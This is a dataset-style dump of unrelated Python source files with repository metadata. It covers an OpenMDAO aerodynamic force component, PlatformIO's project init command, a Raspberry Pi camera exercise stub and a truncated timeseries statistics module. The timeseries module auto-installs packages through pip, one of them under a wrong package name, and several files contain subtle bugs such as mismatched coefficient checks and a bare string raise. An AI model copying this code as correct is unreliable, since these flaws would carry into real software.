'C_L' in d_outputs: d_outputs['C_L'] += lift * d_nondim if 'C_D' in d_outputs: d_outputs['C_D'] += drag * d_nondim if 'CM_X' in d_outputs: d_outputs['CM_X'] += m_x * d_nondim / c if 'CM_X' in d_outputs: d_outputs['CM_Y'] += m_y * d_nondim / c if 'CM_Z' in d_outputs: d_outputs['CM_Z'] += m_z * d_nondim / c if 'x_aero' in d_inputs: dx = d_inputs['x_aero'][0::3] dy = d_inputs['x_aero'][1::3] dz = d_inputs['x_aero'][2::3] if 'M_X' in d_outputs: d_outputs['M_X'] += np.dot(fz,dy) - np.dot(fy,dz) if 'M_Y' in d_outputs: d_outputs['M_Y'] += -np.dot(fz,dx) + np.dot(fx,dz) if 'M_Z' in d_outputs: d_outputs['M_Z'] += np.dot(fy,dx) - np.dot(fx,dy) if 'CM_X' in d_outputs: d_outputs['CM_X'] += ( np.dot(fz,dy) - np.dot(fy,dz)) / (q_inf * area * c) if 'CM_Y' in d_outputs: d_outputs['CM_Y'] += (-np.dot(fz,dx) + np.dot(fx,dz)) / (q_inf * area * c) if 'CM_Z' in d_outputs: d_outputs['CM_Z'] += ( np.dot(fy,dx) - np.dot(fx,dy)) / (q_inf * area * c) if 'f_aero' in d_inputs: dfx = d_inputs['f_aero'][0::3] dfy = d_inputs['f_aero'][1::3] dfz = d_inputs['f_aero'][2::3] dfx_total = np.sum(dfx) dfy_total = np.sum(dfy) dfz_total = np.sum(dfz) if 'F_X' in d_outputs: d_outputs['F_X'] += dfx_total if 'F_Y' in d_outputs: d_outputs['F_Y'] += dfy_total if 'F_Z' in d_outputs: d_outputs['F_Z'] += dfz_total if 'C_X' in d_outputs: d_outputs['C_X'] += dfx_total / (q_inf * area) if 'C_Y' in d_outputs: d_outputs['C_Y'] += dfy_total / (q_inf * area) if 'C_Z' in d_outputs: d_outputs['C_Z'] += dfz_total / (q_inf * area) if 'Lift' in d_outputs: d_outputs['Lift'] += -dfx_total * np.sin(aoa) + dfz_total * np.cos(aoa) if 'Drag' in d_outputs: d_outputs['Drag'] += ( dfx_total * np.cos(aoa) * np.cos(yaw) - dfy_total * np.sin(yaw) + dfz_total * np.sin(aoa) * np.cos(yaw) ) if 'C_L' in d_outputs: d_outputs['C_L'] += (-dfx_total * np.sin(aoa) + dfz_total * np.cos(aoa)) / (q_inf * area) if 'C_D' in d_outputs: d_outputs['C_D'] += ( dfx_total * np.cos(aoa) * np.cos(yaw) - dfy_total * np.sin(yaw) + dfz_total * np.sin(aoa) * np.cos(yaw) ) / (q_inf * area) if 'M_X' in d_outputs: d_outputs['M_X'] += np.dot(dfz,(y-yc)) - np.dot(dfy,(z-zc)) if 'M_Y' in d_outputs: d_outputs['M_Y'] += -np.dot(dfz,(x-xc)) + np.dot(dfx,(z-zc)) if 'M_Z' in d_outputs: d_outputs['M_Z'] += np.dot(dfy,(x-xc)) - np.dot(dfx,(y-yc)) if 'CM_X' in d_outputs: d_outputs['CM_X'] += ( np.dot(dfz,(y-yc)) - np.dot(dfy,(z-zc))) / (q_inf * area * c) if 'CM_Y' in d_outputs: d_outputs['CM_Y'] += (-np.dot(dfz,(x-xc)) + np.dot(dfx,(z-zc))) / (q_inf * area * c) if 'CM_Z' in d_outputs: d_outputs['CM_Z'] += ( np.dot(dfy,(x-xc)) - np.dot(dfx,(y-yc))) / (q_inf * area * c) elif mode == 'rev': if 'aoa' in d_inputs: if 'Lift' in d_outputs or 'C_L' in d_outputs: d_lift = d_outputs['Lift'] if 'Lift' in d_outputs else 0.0 d_cl = d_outputs['C_L'] if 'C_L' in d_outputs else 0.0 d_inputs['aoa'] += ( - fx_total * np.cos(aoa) - fz_total * np.sin(aoa) ) * (d_lift + d_cl / (q_inf * area)) if 'Drag' in d_outputs or 'C_D' in d_outputs: d_drag = d_outputs['Drag'] if 'Drag' in d_outputs else 0.0 d_cd = d_outputs['C_D'] if 'C_D' in d_outputs else 0.0 d_inputs['aoa'] += ( fx_total * (-np.sin(aoa)) * np.cos(yaw) + fz_total * ( np.cos(aoa)) * np.cos(yaw) ) * (d_drag + d_cd / (q_inf * area)) if 'yaw' in d_inputs: if 'Drag' in d_outputs or 'C_D' in d_outputs: d_drag = d_outputs['Drag'] if 'Drag' in d_outputs else 0.0 d_cd = d_outputs['C_D'] if 'C_D' in d_outputs else 0.0 d_inputs['yaw'] += ( fx_total * np.cos(aoa) * (-np.sin(yaw)) - fy_total * np.cos(yaw) + fz_total * np.sin(aoa) * (-np.sin(yaw)) ) * (d_drag + d_cd / (q_inf * 
area)) if 'ref_area' in d_inputs: d_nondim = - 1.0 / (q_inf * area**2.0) if 'C_X' in d_outputs: d_inputs['ref_area'] += d_outputs['C_X'] * fx_total * d_nondim if 'C_Y' in d_outputs: d_inputs['ref_area'] += d_outputs['C_Y'] * fy_total * d_nondim if 'C_Z' in d_outputs: d_inputs['ref_area'] += d_outputs['C_Z'] * fz_total * d_nondim if 'C_L' in d_outputs: d_inputs['ref_area'] += d_outputs['C_L'] * lift * d_nondim if 'C_D' in d_outputs: d_inputs['ref_area'] += d_outputs['C_D'] * drag * d_nondim if 'CM_X' in d_outputs: d_inputs['ref_area'] += d_outputs['CM_X'] * m_x * d_nondim / c if 'CM_X' in d_outputs: d_inputs['ref_area'] += d_outputs['CM_Y'] * m_y * d_nondim / c if 'CM_Z' in d_outputs: d_inputs['ref_area'] += d_outputs['CM_Z'] * m_z * d_nondim / c if 'moment_center' in d_inputs: if 'M_X' in d_outputs: d_inputs['moment_center'][1] += -fz_total * d_outputs['M_X'] d_inputs['moment_center'][2] += fy_total * d_outputs['M_X'] if 'M_Y' in d_outputs: d_inputs['moment_center'][0] += fz_total * d_outputs['M_Y'] d_inputs['moment_center'][2] += -fx_total * d_outputs['M_Y'] if 'M_Z' in d_outputs: d_inputs['moment_center'][0] += -fy_total * d_outputs['M_Z'] d_inputs['moment_center'][1] += fx_total * d_outputs['M_Z'] if 'CM_X' in d_outputs: d_inputs['moment_center'][1] += -fz_total * d_outputs['CM_X'] / (q_inf * area * c) d_inputs['moment_center'][2] += fy_total * d_outputs['CM_X'] / (q_inf * area * c) if 'CM_Y' in d_outputs: d_inputs['moment_center'][0] += fz_total * d_outputs['CM_Y'] / (q_inf * area * c) d_inputs['moment_center'][2] += -fx_total * d_outputs['CM_Y'] / (q_inf * area * c) if 'CM_Z' in d_outputs: d_inputs['moment_center'][0] += -fy_total * d_outputs['CM_Z'] / (q_inf * area * c) d_inputs['moment_center'][1] += fx_total * d_outputs['CM_Z'] / (q_inf * area * c) if 'ref_length' in d_inputs: d_nondim = - 1.0 / (q_inf * area * c**2.0) if 'CM_X' in d_outputs: d_inputs['ref_length'] += m_x * d_nondim * d_outputs['CM_X'] if 'CM_X' in d_outputs: d_inputs['ref_length'] += m_y * d_nondim * d_outputs['CM_Y'] if 'CM_Z' in d_outputs: d_inputs['ref_length'] += m_z * d_nondim * d_outputs['CM_Z'] if 'q_inf' in d_inputs: d_nondim = - 1.0 / (q_inf**2.0 * area) if 'C_X' in d_outputs: d_inputs['q_inf'] += d_outputs['C_X'] * fx_total * d_nondim if 'C_Y' in d_outputs: d_inputs['q_inf'] += d_outputs['C_Y'] * fy_total * d_nondim if 'C_Z' in d_outputs: d_inputs['q_inf'] += d_outputs['C_Z'] * fz_total * d_nondim if 'C_L' in d_outputs: d_inputs['q_inf'] += d_outputs['C_L'] * lift * d_nondim if 'C_D' in d_outputs: d_inputs['q_inf'] += d_outputs['C_D'] * drag * d_nondim if 'CM_X' in d_outputs: d_inputs['q_inf'] += d_outputs['CM_X'] * m_x * d_nondim / c if 'CM_X' in d_outputs: d_inputs['q_inf'] += d_outputs['CM_Y'] * m_y * d_nondim / c if 'CM_Z' in d_outputs: d_inputs['q_inf'] += d_outputs['CM_Z'] * m_z * d_nondim / c if 'x_aero' in d_inputs: nondim = 1.0 / (q_inf * area * c) dm_x = d_outputs['M_X'] if 'M_X' in d_outputs else 0.0 dm_y = d_outputs['M_Y'] if 'M_Y' in d_outputs else 0.0 dm_z = d_outputs['M_Z'] if 'M_Z' in d_outputs else 0.0 dcm_x = d_outputs['CM_X']*nondim if 'CM_X' in d_outputs else 0.0 dcm_y = d_outputs['CM_Y']*nondim if 'CM_Y' in d_outputs else 0.0 dcm_z = d_outputs['CM_Z']*nondim if 'CM_Z' in d_outputs else 0.0 d_inputs['x_aero'][0::3] += -fz * (dm_y + dcm_y) + fy * (dm_z + dcm_z) d_inputs['x_aero'][1::3] += fz * (dm_x + dcm_x) - fx * (dm_z + dcm_z) d_inputs['x_aero'][2::3] += -fy * (dm_x + dcm_x) + fx * (dm_y + dcm_y) if 'f_aero' in d_inputs: if 'F_X' in d_outputs: d_inputs['f_aero'][0::3] += 
d_outputs['F_X'] if 'F_Y' in d_outputs: d_inputs['f_aero'][1::3] += d_outputs['F_Y'] if 'F_Z' in d_outputs: d_inputs['f_aero'][2::3] += d_outputs['F_Z'] if 'C_X' in d_outputs: d_inputs['f_aero'][0::3] += d_outputs['C_X'] / (q_inf * area) if 'C_Y' in d_outputs: d_inputs['f_aero'][1::3] += d_outputs['C_Y'] / (q_inf * area) if 'C_Z' in d_outputs: d_inputs['f_aero'][2::3] += d_outputs['C_Z'] / (q_inf * area) if 'Lift' in d_outputs: d_inputs['f_aero'][0::3] += -np.sin(aoa) * d_outputs['Lift'] d_inputs['f_aero'][2::3] += np.cos(aoa) * d_outputs['Lift'] if 'Drag' in d_outputs: d_inputs['f_aero'][0::3] += np.cos(aoa) * np.cos(yaw) * d_outputs['Drag'] d_inputs['f_aero'][1::3] += -np.sin(yaw) * d_outputs['Drag'] d_inputs['f_aero'][2::3] += np.sin(aoa) * np.cos(yaw) * d_outputs['Drag'] if 'C_L' in d_outputs: d_inputs['f_aero'][0::3] += -np.sin(aoa) * d_outputs['C_L'] / (q_inf * area) d_inputs['f_aero'][2::3] += np.cos(aoa) * d_outputs['C_L'] / (q_inf * area) if 'C_D' in d_outputs: d_inputs['f_aero'][0::3] += np.cos(aoa) * np.cos(yaw) * d_outputs['C_D'] / (q_inf * area) d_inputs['f_aero'][1::3] += -np.sin(yaw) * d_outputs['C_D'] / (q_inf * area) d_inputs['f_aero'][2::3] += np.sin(aoa) * np.cos(yaw) * d_outputs['C_D'] / (q_inf * area) if 'M_X' in d_outputs: d_inputs['f_aero'][1::3] += -(z-zc) * d_outputs['M_X'] d_inputs['f_aero'][2::3] += (y-yc) * d_outputs['M_X'] if 'M_Y' in d_outputs: d_inputs['f_aero'][0::3] += (z-zc) * d_outputs['M_Y'] d_inputs['f_aero'][2::3] += -(x-xc) * d_outputs['M_Y'] if 'M_Z' in d_outputs: d_inputs['f_aero'][0::3] += -(y-yc) * d_outputs['M_Z'] d_inputs['f_aero'][1::3] += (x-xc) * d_outputs['M_Z'] if 'CM_X' in d_outputs: d_inputs['f_aero'][1::3] += -(z-zc) * d_outputs['CM_X'] / (q_inf * area * c) d_inputs['f_aero'][2::3] += (y-yc) * d_outputs['CM_X'] / (q_inf * area * c) if 'CM_Y' in d_outputs: d_inputs['f_aero'][0::3] += (z-zc) * d_outputs['CM_Y'] / (q_inf * area * c) d_inputs['f_aero'][2::3] += -(x-xc) * d_outputs['CM_Y'] / (q_inf * area * c) if 'CM_Z' in d_outputs: d_inputs['f_aero'][0::3] += -(y-yc) * d_outputs['CM_Z'] / (q_inf * area * c) d_inputs['f_aero'][1::3] += (x-xc) * d_outputs['CM_Z'] / (q_inf * area * c) def check_integrated_surface_force_partials(): nnodes = 3 prob = om.Problem() ivc = om.IndepVarComp() ivc.add_output('aoa',val=45.0, units='deg') ivc.add_output('yaw',val=135.0, units='deg') ivc.add_output('ref_area',val=0.2) ivc.add_output('moment_center',shape=3,val=np.zeros(3)) ivc.add_output('ref_length', val = 3.0) ivc.add_output('q_inf',val=10.0) ivc.add_output('x_aero',shape=3*nnodes,val=np.random.rand(3*nnodes),distributed=True) ivc.add_output('f_aero',shape=3*nnodes,val=np.random.rand(3*nnodes),distributed=True) prob.model.add_subsystem('ivc',ivc,promotes_outputs=['*']) prob.model.add_subsystem('forces',IntegratedSurfaceForces(), promotes_inputs=['*']) prob.setup(force_alloc_complex=True) prob.run_model() prob.check_partials(compact_print=True, method='cs') if __name__ == '__main__': check_integrated_surface_force_partials()
23,629
31
126
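The forward-mode block in the component above hand-codes the lift derivative with respect to angle of attack as d_lift_d_aoa = (-fx_total*cos(aoa) - fz_total*sin(aoa))*daoa, while the file's own check_integrated_surface_force_partials() verifies every partial through OpenMDAO's complex-step check. A minimal, framework-free cross-check of that one expression, assuming arbitrary made-up force totals (not values from the file above), could look like this:

import numpy as np

# Hypothetical force totals [N] and angle of attack [rad]; chosen only for illustration.
fx_total, fz_total = 120.0, 850.0
aoa, h = np.deg2rad(3.0), 1.0e-6

def lift(a):
    # Lift in wind axes, matching the compute() expression above.
    return -fx_total * np.sin(a) + fz_total * np.cos(a)

analytic = -fx_total * np.cos(aoa) - fz_total * np.sin(aoa)      # same form as d_lift_d_aoa above
fd = (lift(aoa + h) - lift(aoa - h)) / (2.0 * h)                  # central finite difference

print(analytic, fd)   # the two numbers should agree to roughly 1e-8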
7c3b77cba219a97b12762ac1a37f632c5f68d380
11,331
py
Python
platformio/project/commands/init.py
ufo2011/platformio-core
0ceae62701731f8b32c34d7993a34dea34aea59c
[ "Apache-2.0" ]
null
null
null
platformio/project/commands/init.py
ufo2011/platformio-core
0ceae62701731f8b32c34d7993a34dea34aea59c
[ "Apache-2.0" ]
null
null
null
platformio/project/commands/init.py
ufo2011/platformio-core
0ceae62701731f8b32c34d7993a34dea34aea59c
[ "Apache-2.0" ]
null
null
null
# Copyright (c) 2014-present PlatformIO <contact@platformio.org> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # pylint: disable=line-too-long,too-many-arguments,too-many-locals import json import os import click from platformio import fs from platformio.package.commands.install import install_project_dependencies from platformio.package.manager.platform import PlatformPackageManager from platformio.platform.exception import UnknownBoard from platformio.project.config import ProjectConfig from platformio.project.generator import ProjectGenerator from platformio.project.helpers import is_platformio_project @click.command("init", short_help="Initialize a project or update existing") @click.option( "--project-dir", "-d", default=os.getcwd, type=click.Path( exists=True, file_okay=False, dir_okay=True, writable=True, resolve_path=True ), ) @click.option("-b", "--board", multiple=True, metavar="ID", callback=validate_boards) @click.option("--ide", type=click.Choice(ProjectGenerator.get_supported_ides())) @click.option("-e", "--environment", help="Update existing environment") @click.option("-O", "--project-option", multiple=True) @click.option("--env-prefix", default="") @click.option("--no-install-dependencies", is_flag=True) @click.option("-s", "--silent", is_flag=True)
31.828652
119
0.662519
# Copyright (c) 2014-present PlatformIO <contact@platformio.org> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # pylint: disable=line-too-long,too-many-arguments,too-many-locals import json import os import click from platformio import fs from platformio.package.commands.install import install_project_dependencies from platformio.package.manager.platform import PlatformPackageManager from platformio.platform.exception import UnknownBoard from platformio.project.config import ProjectConfig from platformio.project.generator import ProjectGenerator from platformio.project.helpers import is_platformio_project def validate_boards(ctx, param, value): # pylint: disable=W0613 pm = PlatformPackageManager() for id_ in value: try: pm.board_config(id_) except UnknownBoard: raise click.BadParameter( "`%s`. Please search for board ID using `platformio boards` " "command" % id_ ) return value @click.command("init", short_help="Initialize a project or update existing") @click.option( "--project-dir", "-d", default=os.getcwd, type=click.Path( exists=True, file_okay=False, dir_okay=True, writable=True, resolve_path=True ), ) @click.option("-b", "--board", multiple=True, metavar="ID", callback=validate_boards) @click.option("--ide", type=click.Choice(ProjectGenerator.get_supported_ides())) @click.option("-e", "--environment", help="Update existing environment") @click.option("-O", "--project-option", multiple=True) @click.option("--env-prefix", default="") @click.option("--no-install-dependencies", is_flag=True) @click.option("-s", "--silent", is_flag=True) def project_init_cmd( project_dir, board, ide, environment, project_option, env_prefix, no_install_dependencies, silent, ): is_new_project = not is_platformio_project(project_dir) if is_new_project: if not silent: print_header(project_dir) init_base_project(project_dir) if environment: update_project_env(project_dir, environment, project_option) elif board: update_board_envs(project_dir, board, project_option, env_prefix) # resolve project dependencies if not no_install_dependencies and (environment or board): install_project_dependencies( options=dict( project_dir=project_dir, environments=[environment] if environment else [], silent=silent, ) ) if ide: if not silent: click.echo( "Updating metadata for the %s IDE..." 
% click.style(ide, fg="cyan") ) with fs.cd(project_dir): config = ProjectConfig.get_instance( os.path.join(project_dir, "platformio.ini") ) config.validate() ProjectGenerator(config, environment, ide, board).generate() if is_new_project: init_cvs_ignore(project_dir) if not silent: print_footer(is_new_project) def print_header(project_dir): if project_dir == os.getcwd(): click.secho("\nThe current working directory ", fg="yellow", nl=False) try: click.secho(project_dir, fg="cyan", nl=False) except UnicodeEncodeError: click.secho(json.dumps(project_dir), fg="cyan", nl=False) click.secho(" will be used for the project.", fg="yellow") click.echo("") click.echo("The next files/directories have been created in ", nl=False) try: click.secho(project_dir, fg="cyan") except UnicodeEncodeError: click.secho(json.dumps(project_dir), fg="cyan") click.echo("%s - Put project header files here" % click.style("include", fg="cyan")) click.echo( "%s - Put here project specific (private) libraries" % click.style("lib", fg="cyan") ) click.echo("%s - Put project source files here" % click.style("src", fg="cyan")) click.echo( "%s - Project Configuration File" % click.style("platformio.ini", fg="cyan") ) def print_footer(is_new_project): if is_new_project: return click.secho( "\nProject has been successfully initialized! Useful commands:\n" "`pio run` - process/build project from the current directory\n" "`pio run --target upload` or `pio run -t upload` " "- upload firmware to a target\n" "`pio run --target clean` - clean project (remove compiled files)" "\n`pio run --help` - additional information", fg="green", ) return click.secho( "Project has been successfully updated!", fg="green", ) def init_base_project(project_dir): with fs.cd(project_dir): config = ProjectConfig() config.save() dir_to_readme = [ (config.get("platformio", "src_dir"), None), (config.get("platformio", "include_dir"), init_include_readme), (config.get("platformio", "lib_dir"), init_lib_readme), (config.get("platformio", "test_dir"), init_test_readme), ] for (path, cb) in dir_to_readme: if os.path.isdir(path): continue os.makedirs(path) if cb: cb(path) def init_include_readme(include_dir): with open(os.path.join(include_dir, "README"), mode="w", encoding="utf8") as fp: fp.write( """ This directory is intended for project header files. A header file is a file containing C declarations and macro definitions to be shared between several project source files. You request the use of a header file in your project source file (C, C++, etc) located in `src` folder by including it, with the C preprocessing directive `#include'. ```src/main.c #include "header.h" int main (void) { ... } ``` Including a header file produces the same results as copying the header file into each source file that needs it. Such copying would be time-consuming and error-prone. With a header file, the related declarations appear in only one place. If they need to be changed, they can be changed in one place, and programs that include the header file will automatically use the new version when next recompiled. The header file eliminates the labor of finding and changing all the copies as well as the risk that a failure to find one copy will result in inconsistencies within a program. In C, the usual convention is to give header files names that end with `.h'. It is most portable to use only letters, digits, dashes, and underscores in header file names, and at most one dot. 
Read more about using header files in official GCC documentation: * Include Syntax * Include Operation * Once-Only Headers * Computed Includes https://gcc.gnu.org/onlinedocs/cpp/Header-Files.html """, ) def init_lib_readme(lib_dir): with open(os.path.join(lib_dir, "README"), mode="w", encoding="utf8") as fp: fp.write( """ This directory is intended for project specific (private) libraries. PlatformIO will compile them to static libraries and link into executable file. The source code of each library should be placed in a an own separate directory ("lib/your_library_name/[here are source files]"). For example, see a structure of the following two libraries `Foo` and `Bar`: |--lib | | | |--Bar | | |--docs | | |--examples | | |--src | | |- Bar.c | | |- Bar.h | | |- library.json (optional, custom build options, etc) https://docs.platformio.org/page/librarymanager/config.html | | | |--Foo | | |- Foo.c | | |- Foo.h | | | |- README --> THIS FILE | |- platformio.ini |--src |- main.c and a contents of `src/main.c`: ``` #include <Foo.h> #include <Bar.h> int main (void) { ... } ``` PlatformIO Library Dependency Finder will find automatically dependent libraries scanning project source files. More information about PlatformIO Library Dependency Finder - https://docs.platformio.org/page/librarymanager/ldf.html """, ) def init_test_readme(test_dir): with open(os.path.join(test_dir, "README"), mode="w", encoding="utf8") as fp: fp.write( """ This directory is intended for PlatformIO Test Runner and project tests. Unit Testing is a software testing method by which individual units of source code, sets of one or more MCU program modules together with associated control data, usage procedures, and operating procedures, are tested to determine whether they are fit for use. Unit testing finds problems early in the development cycle. 
More information about PlatformIO Unit Testing: - https://docs.platformio.org/en/latest/advanced/unit-testing/index.html """, ) def init_cvs_ignore(project_dir): conf_path = os.path.join(project_dir, ".gitignore") if os.path.isfile(conf_path): return with open(conf_path, mode="w", encoding="utf8") as fp: fp.write(".pio\n") def update_board_envs(project_dir, board_ids, project_option, env_prefix): config = ProjectConfig( os.path.join(project_dir, "platformio.ini"), parse_extra=False ) used_boards = [] for section in config.sections(): cond = [section.startswith("env:"), config.has_option(section, "board")] if all(cond): used_boards.append(config.get(section, "board")) pm = PlatformPackageManager() modified = False for id_ in board_ids: board_config = pm.board_config(id_) if id_ in used_boards: continue used_boards.append(id_) modified = True envopts = {"platform": board_config["platform"], "board": id_} # find default framework for board frameworks = board_config.get("frameworks") if frameworks: envopts["framework"] = frameworks[0] for item in project_option: if "=" not in item: continue _name, _value = item.split("=", 1) envopts[_name.strip()] = _value.strip() section = "env:%s%s" % (env_prefix, id_) config.add_section(section) for option, value in envopts.items(): config.set(section, option, value) if modified: config.save() def update_project_env(project_dir, environment, project_option): if not project_option: return config = ProjectConfig( os.path.join(project_dir, "platformio.ini"), parse_extra=False ) section = "env:%s" % environment if not config.has_section(section): config.add_section(section) for item in project_option: if "=" not in item: continue _name, _value = item.split("=", 1) config.set(section, _name.strip(), _value.strip()) config.save()
9,248
0
252
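For reference, the update_board_envs() helper in the record above writes one [env:<board>] section per new board into platformio.ini, filling platform, board, the first framework listed in the board manifest, and any extra -O key=value pairs. A typical generated section, shown here for the Arduino Uno purely as an illustrative example (the actual platform and framework strings always come from the board manifest, not from this sketch), looks like:

[env:uno]
platform = atmelavr
board = uno
framework = arduino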
c91b624711d1778d78556d13356f05fa1dcaaef7
701
py
Python
exercise_monitoring_camera.py
Guvalif/aidor-acceleration-02
afa7aa45bf26f1c2b7f189b6320599357f1e17d3
[ "MIT" ]
1
2018-08-20T02:14:24.000Z
2018-08-20T02:14:24.000Z
exercise_monitoring_camera.py
Guvalif/imedio_0801
afa7aa45bf26f1c2b7f189b6320599357f1e17d3
[ "MIT" ]
null
null
null
exercise_monitoring_camera.py
Guvalif/imedio_0801
afa7aa45bf26f1c2b7f189b6320599357f1e17d3
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- __author__ = 'Kazuyuki TAKASE' __copyright__ = 'PLEN Project Company Inc, and all authors.' __license__ = 'The MIT License (http://opensource.org/licenses/mit-license.php)' # Load external programs # ============================================================================= from time import sleep from cv2 import VideoCapture, imwrite from wiringpi import * # Constant definitions and initialization # ============================================================================= CAMERA_INDEX = 0 MOTION_PIN = 26 camera = VideoCapture(CAMERA_INDEX) wiringPiSetupGpio() # Main loop # ============================================================================= while True: # Write the rest yourself pass
23.366667
82
0.476462
# -*- coding: utf-8 -*- __author__ = 'Kazuyuki TAKASE' __copyright__ = 'PLEN Project Company Inc, and all authors.' __license__ = 'The MIT License (http://opensource.org/licenses/mit-license.php)' # Load external programs # ============================================================================= from time import sleep from cv2 import VideoCapture, imwrite from wiringpi import * # Constant definitions and initialization # ============================================================================= CAMERA_INDEX = 0 MOTION_PIN = 26 camera = VideoCapture(CAMERA_INDEX) wiringPiSetupGpio() # Main loop # ============================================================================= while True: # Write the rest yourself pass
0
0
0
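The main loop in the monitoring-camera exercise above is intentionally left empty; the final comment asks the reader to write the rest. A minimal sketch of one possible completion, assuming an active-high PIR motion sensor on MOTION_PIN and reusing the names the script already sets up (sleep, imwrite, camera, plus pinMode/digitalRead from the wildcard wiringpi import), might look like:

pinMode(MOTION_PIN, 0)                      # 0 = INPUT in wiringPi
counter = 0

while True:
    if digitalRead(MOTION_PIN) == 1:        # 1 = HIGH: motion detected (assumed active-high sensor)
        ok, frame = camera.read()           # grab one frame from the USB camera
        if ok:
            imwrite('motion_%03d.jpg' % counter, frame)   # hypothetical file name scheme
            counter += 1
    sleep(1)                                # poll roughly once per second

Pin mode and HIGH are written as raw integers (0 and 1) so the sketch does not depend on which constant names a particular wiringpi build exposes; the poll interval and file names are arbitrary choices, not part of the original exercise.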
4cc967e9e9d1ac88abda9c1076b57abe84fc47bc
32,902
py
Python
src/timeseries.py
AmberCrafter/pythonlib_statistic
0fd49283c8dd75c5d1ade064be3318eabf74bdfe
[ "MIT" ]
null
null
null
src/timeseries.py
AmberCrafter/pythonlib_statistic
0fd49283c8dd75c5d1ade064be3318eabf74bdfe
[ "MIT" ]
null
null
null
src/timeseries.py
AmberCrafter/pythonlib_statistic
0fd49283c8dd75c5d1ade064be3318eabf74bdfe
[ "MIT" ]
null
null
null
#!/bin/python3 # if used ubuntu 20.10 or later, interpreter set as #!/bin/python and use pip instead of pip3 # =================================================================== # # platfrom check # dateutil check and import try: from dateutil.relativedelta import relativedelta except: import os,sys,subprocess if os.name=='nt': subprocess.check_call([sys.executable, "-m", "pip", "install", "dateutil"]) elif os.name=='posix': subprocess.check_call([sys.executable, "-m", "pip3", "install", "dateutil"]) else: raise "Unknow platform, please install 'dateutil' by yourself." from dateutil.relativedelta import relativedelta # =================================================================== # # platfrom check # numpy check and import try: import numpy as np except: import os,sys,subprocess if os.name=='nt': subprocess.check_call([sys.executable, "-m", "pip", "install", "numpy"]) elif os.name=='posix': subprocess.check_call([sys.executable, "-m", "pip3", "install", "numpy"]) else: raise "Unknow platform, please install 'numpy' by yourself." import numpy as np # =================================================================== # import datetime from typing import Union class Time(object): ''' storageForward: True -> storage value in starttime <br> storageForward: False -> storage value in endtime ''' @staticmethod @staticmethod def _set_header(data,header=None): ''' only used to format output data ''' # ----------------------------------------------------------- # # here i'm not sure what data type i need to use. # thus, if data=np.array(obj(dict)), then we need # to use data.item() to get the data try: data=data.item() except: pass # ----------------------------------------------------------- # if header!=None: dummy={} for i,head in enumerate(header): if isinstance(data,dict): for key in data.keys(): if i==0: dummy[key]={} dummy[key][head]=data[key][:,i] else: dummy[head]=data[:,i] return dummy return data @staticmethod def _fixTime(time,data,timeStep:dict,zeroPara:dict,storageForward:bool,outputPara_list:list, starttime:datetime.datetime=None,endtime:datetime.datetime=None): # def _fixTime(time,data,timeStep:dict,ratio:int,zeroPara:dict,storageForward:bool,starttime:datetime.datetime=None,endtime:datetime.datetime=None): ''' zeroPara: set start datetime para season enum: 1: spring 2: summer 3: autumn 4: winter ''' minTime = np.nanmin(time) if starttime==None else starttime maxTime = np.nanmax(time) if endtime==None else endtime # get data_value if isinstance(data,dict): if 'mean' in data.keys(): data=data['mean'] if 'season' in timeStep.keys(): dt = relativedelta(months=3) if not storageForward: time+=dt; time+=datetime.timedelta(microseconds=-1) maxTime+=dt if zeroPara!=None: minTime=minTime.replace(**zeroPara) dummy={} for para in outputPara_list: if para=='quartile': dummy['lower']=[] dummy['median']=[] dummy['upper']=[] else: dummy[para]=[] tummy = [] count = [] # deal with perfix date before a new start i = Time._get_season(minTime.month) year = minTime.year if minTime.month!=12 else minTime.year+1 mask=np.where(time<datetime.datetime(year,3*i,1))[0] t,d,c = Time._nofixTime(time[mask],data[mask],parameter='season',outputPara_list=outputPara_list) tummy+=list(t); count+=list(c) for key in dummy.keys(): dummy[key]+=list(d[key]) minTime=datetime.datetime(year,3*i,1) while minTime<=maxTime: if minTime>max(time): break mask=np.where((time>=minTime) & (time<minTime+dt))[0] t,d,c = Time._nofixTime(time[mask],data[mask],parameter='season',outputPara_list=outputPara_list) tummy+=list(t); 
count+=list(c) for key in dummy.keys(): dummy[key]+=list(d[key]) minTime+=dt else: dt = relativedelta(**timeStep) if not storageForward: time+=dt; time+=datetime.timedelta(microseconds=-1) maxTime+=dt if zeroPara!=None: minTime=minTime.replace(**zeroPara) # if ratio==None: ratio=0 dummy = {} for para in outputPara_list: if para=='quartile': dummy['lower']=[] dummy['median']=[] dummy['upper']=[] else: dummy[para]=[] tummy = [] count = [] while minTime<=maxTime: mask = np.where((time>=minTime) & (time<minTime+dt))[0] if mask.size==0: minTime+=dt; continue tummy.append(minTime) count.append(np.sum(np.isfinite(data[mask]))) if 'mean' in outputPara_list: dummy['mean'].append(np.nanmean(data[mask],axis=0)) if 'std' in outputPara_list: dummy['std'].append(np.nanstd(data[mask],axis=0)) if 'max' in outputPara_list: dummy['max'].append(np.nanmax(data[mask],axis=0)) if 'min' in outputPara_list: dummy['min'].append(np.nanmin(data[mask],axis=0)) if 'maxTime' in outputPara_list: dummy['maxTime'].append(time[mask][np.argmax(data[mask],axis=0)]) if 'maxTime' in outputPara_list: dummy['minTime'].append(time[mask][np.argmin(data[mask],axis=0)]) if 'quartile' in outputPara_list: dummy['lower'].append(np.nanpercentile(data[mask],25,axis=0)) if ('quartile' in outputPara_list) | ('median' in outputPara_list): dummy['median'].append(np.nanpercentile(data[mask],50,axis=0)) if 'quartile' in outputPara_list: dummy['upper'].append(np.nanpercentile(data[mask],75,axis=0)) # dummy.append(np.nanmean(data[mask],axis=0) if count[-1]>=ratio else np.array([np.nan]*len(data[0]))) minTime+=dt dummy = Time._set_ndarray(dummy) return tummy,dummy,count @staticmethod def _nofixTime(time,data,parameter:str,outputPara_list:list): # def _nofixTime(time,data,parameter:str,ratio:int): ''' parameter: set the datetime parameter (second, minute ...etc) will be used to calculate season enum: 1: winter 